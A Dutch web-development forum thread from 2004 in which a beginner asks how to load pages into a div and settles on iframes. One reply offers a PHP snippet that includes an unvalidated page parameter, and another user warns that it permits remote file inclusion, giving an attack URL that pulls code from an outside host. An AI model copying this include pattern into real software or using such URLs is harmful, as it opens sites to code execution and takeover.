html in div laden? via link

Pagina: 1
Acties:
  • 3.535 views sinds 30-01-2008
  • Reageer

• mazzl
  • Registratie: Januari 2001
  • Laatst online: 02-12-2025
Ik ben vrij nieuw in het div gebeuren, en ik heb nu mijn frames opmaak vervangen door div's .. dat was al een behoorlijk karwij.. :7
maar hoe kan ik nu vanuit mijn left_col via een link een pagina in mijn content openenen?
Hier mijn code

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#left-col 
{ 
position: relative; 
margin: 0 0 0 -190px; 
padding: 100px 0 60px 0; 
width: 180px; 
background: #eee; 
color: #000; 
} 

#content 
{ 
position: relative; 
float: right; 
margin: 100px 0 0 0; 
padding: 0 0 60px 0; 
width: 550px; 
color: #000; 
} 

<div id="left-col">
    <A HREF="content.htm" >Content</A><br>
</div>

ik wil via een link een pagina laden in het content panel maar ik weet niet hoe :(.. alle tips welkom!

If you don't stand for something you'll fall for everything

• RM-rf
  • Registratie: September 2000
  • Laatst online: 22-02 14:51

RM-rf

1 2 3 4 5 7 6 8 9

wat je wil kan enkel een IFRAME, hooguit kun je een hidden iframe gebruiken die de data 'onzichtbaar laad en dan onload de data transfereerd naar de DIV toe (vooral handig als je styles die aangestuurd worden door CSS in de hele pagina consequent blijven)

Intelligente mensen zoeken in tijden van crisis naar oplossingen, Idioten zoeken dan schuldigen

• Bram77
  • Registratie: September 2004
  • Laatst online: 10-07-2023
Of je moet PHP include() gebruiken. Maar dan moet je wel eerst PHP kennen.

• Cubix
  • Registratie: Juni 2001
  • Niet online
Het lijkt mij dat je nog veel te veel met het frames principe aan het denken bent.

Maak gewoon nieuwe pagina's, en include (php) de standaard componenten, zoals header en navigatie.
Het is ook mogelijk steeds dezelfde pagina aan te roepen en via een switch de inhoud te laten kiezen. (ook met php)

• mimic
  • Registratie: Februari 2002
  • Niet online

mimic

O ja joh?

Je kunt hier inderdaad een iframe gebruiken die je door middel van <iframe src="url of file"></iframe> kunt inladen, eventueel kun je de grote nog instellen met width en height in je iframe tag. Iframe is vooral handig omdat je het vrijwel overal kunt plaatsen. op www.w3schools.com staan trouwens wel handige tutjes

[ Voor 5% gewijzigd door mimic op 26-11-2004 14:02 ]

• Bram77
Of je doet het zo...

in je index.php (in deze volgorde)

$page .= ".php";

In je links-menu gebruik je links op deze manier...
<A href="index.php?page=pagina_home">Home</A>
<A href="index.php?page=pagina_links">Links</A>
etc...

en dan <DIV><?php include($page); ?></DIV> waar je de dynamische content wilt hebben...

Dan moet je natuurlijk zorgen dat de pagina's die je aangeeft bij "index.php?page=pagina_iets" ook bestaan, met de inhoud die wil dat ze hebben. In dit geval zous de pagina "pagina_iets.php" moeten bestaan.

• mazzl
thanx.. dus toch nog frames :'(
was daar net helemaal vanafgestapt .. dag werk weggegooid (mja eigen schuld moet ik maar eerst verdiepen en dan pas beginnen ;) )
ik kan geen php gebruiken want dat ondersteund de hosting niet
kan ik gewoon op de plaats waar nu een div staat een iframe plaatsen?

• mazzl
Bram77 schreef op vrijdag 26 november 2004 @ 14:11:
Of je doet het zo...

in je index.php (in deze volgorde)

$page .= ".php";

In je links-menu gebruik je links op deze manier...
<A href="index.php?page=pagina_home">Home</A>
<A href="index.php?page=pagina_links">Links</A>
etc...

en dan <DIV><?php include($page); ?></DIV> waar je de dynamische content wilt hebben...

Dan moet je natuurlijk zorgen dat de pagina's die je aangeeft bij "index.php?page=pagina_iets" ook bestaan, met de inhoud die wil dat ze hebben. In dit geval zous de pagina "pagina_iets.php" moeten bestaan.
zou ik +/- dit met javascript kunnen doen? javascript kan ik wel gebruiken

Verwijderd

Zoals al genoemd: IFrames. Maar wat wil je precies bereiken met het omzetten van frame-opmaak naar div's? Mijn eerste gedachte is daarbij: geen frames. Waarom wil je frames. De enige reden die ik kan bedenk is dat je altijd een menu, header, footer enz. in beeld wil hebben. En het belang daarvan is iets waarover gediscussieerd kan worden.

Als je een vrije linkerkolom hebt zou je bijvoorbeeld kunnen overwegen een menu te maken dat dmv javascript meescrollt. Je hebt dan pagina's die goed te bookmarken zijn, toch een beetje het 'frames' effect in grafische brosers en je menu is nog steeds toegankelijk voor allerlei exotische user-agents. (accessibility)

Lijkt me dus handig om na te gaan wat je precies wil bereiken.

• Bram77
mazzl schreef op vrijdag 26 november 2004 @ 14:14:
[...]

zou ik +/- dit met javascript kunnen doen? javascript kan ik wel gebruiken
Dan moet je aardig moeilijk gaan doen. Dat is alleen mogelijk met omwegen. Zou ik niet aan beginnen.
Er is denk ik wel gratis hosting te vinden voor PHP. Ik weet alleen niet waar. Tis al een tijdje geleden dat ik daar naar heb gezocht.

• 1st_Ro
  • Registratie: December 2002
  • Laatst online: 07-01-2022
Bram77, dit is best gevaarlijk als je niet weet wat je doet ...

Want wat het gevaar dan is is dat je ook externe bestanden kan includen die op jouw server worden geparsed ...

dus:

index.php?page=http://www.hackers.org/hackcode.php

werkt dan ook ... Op onze server hadden ze op die manier een FTP server geplaatst en daar enkele DVDs ter download aangeboden...

Oftewel, beveiligen.

Dit kan wel door het checken of de pagina wel op die plek bestaat m.b.v. file_exists

Even ontopic:

IFRAME lijkt me nog het makkelijkste in dit geval. :)

• mazzl
:)
ik heb het nu gewoon opgelost met iframes idd
ik wist niet dat je gewoon een iframe los ergens kon plaatsen, zeker wel handig :D
waarom ik van frames ben afgestapt?
omdat op w3cschools stond aangegeven dat frames iets van de prehystorie is,
slecht te bookmarken en niet erg zoekmachine vriendelijk.
mja de basis werkt nu :)

code:
1
2
3
4
5
6
7
<div id="content">
<iframe name="IContent">
</iframe></div>

<div id="left-col">
    <A HREF="contact.htm" target="IContent">Contact</A><br>
</div>

nog lang niet mooi .. maar dat komt snel :)

• RM-rf
  • Registratie: September 2000
  • Laatst online: 22-02 14:51

RM-rf

1 2 3 4 5 7 6 8 9

mazzl schreef op vrijdag 26 november 2004 @ 14:13:
thanx.. dus toch nog frames :'(
was daar net helemaal vanafgestapt .. dag werk weggegooid (mja eigen schuld moet ik maar eerst verdiepen en dan pas beginnen ;) )
ik kan geen php gebruiken want dat ondersteund de hosting niet
kan ik gewoon op de plaats waar nu een div staat een iframe plaatsen?
Misschien heb je van 'vriendjes' ooit gehoord dat frames 'fout' zouden zijn en je ze dus niet moet toepassen ...
alles leuk en aardig, maar zulke 'waarheden' bestaan niet op webgebied en mensen die ernaar leven lopen vooral rages na, zonder zich om een conceptuele werkwijze te bekommeren ... (en vaak eindigen ze als hoofdbaviaan op de php-aapjes-rots).

Belangrijke voordelen van frames zijn bv, het beperken van extra data-load, omdat je enkel de beuwste content nieuw hoeft te laden, terwijl andere navigatie-data blijven staan en niet opnieuw ingeladen worden ..
Tevens blijft op deze wijze op een natuurlijke manier de 'state' van het menu bewaart, zeker bij diepergaande uitklapmenu's die ook weer als en soort van pathfinder werken kan dat belangrijk zijn.

Een IFRAME is verder geen traditioneel Frame, het behoeft geen separate Frameset-pagina, maar kan gewoon in statische html-strukturen als element worden ingevoegd en is zelf s dus style-able, positioneerbaar e.d.

Intelligente mensen zoeken in tijden van crisis naar oplossingen, Idioten zoeken dan schuldigen

• RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
RM-rf schreef op vrijdag 26 november 2004 @ 14:32:
[...]

Misschien heb je van 'vriendjes' ooit gehoord dat frames 'fout' zouden zijn en je ze dus niet moet toepassen ...
alles leuk en aardig, maar zulke 'waarheden' bestaan niet op webgebied en mensen die ernaar leven lopen vooral rages na, zonder zich om een conceptuele werkwijze te bekommeren ... (en vaak eindigen ze als hoofdbaviaan op de php-aapjes-rots).
offtopic:
_/-\o_
Dat is nou eindelijk eens iemand die het mooi weet te verwoorden...

Ik ben altijd een beetje "bang" geweest voor IFrame's omdat vooral oudere browser het niet (goed) ondersteunen. Hou daar dus wel even rekening mee (hoewel dat vandaag de dag nog nauwelijks/niet van toepassing is...en ik trek er me zelf ook niks van aan ;) )

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Pagina: 1